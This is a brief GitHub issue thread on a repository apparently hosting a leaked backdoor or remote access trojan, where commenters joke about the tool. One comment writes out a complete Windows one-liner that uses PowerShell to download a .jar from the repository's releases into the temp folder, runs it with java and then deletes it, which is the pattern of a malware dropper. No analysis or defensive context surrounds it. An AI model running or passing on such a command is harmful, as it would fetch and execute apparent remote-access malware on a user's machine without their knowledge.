### ISSUE TITLE
rat

### ISSUE THREAD

**Issue by NotBestDoggo** [ObsidianBreaker/LeuxBackdoorLeaked#2]
nice rat lol

cmd /c powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/ObsidianBreaker/LeuxBackdoorLeaked/releases/download/v/thx.jar','%TEMP%\\thx.jar');&java -jar %TEMP%\\thx.jar&del %TEMP%\\thx.jar /f

**Comment by NotBestDoggo** [comment]
imagine pasting from yoink rat

**Comment by ObsidianBreaker** [comment]
that's so old
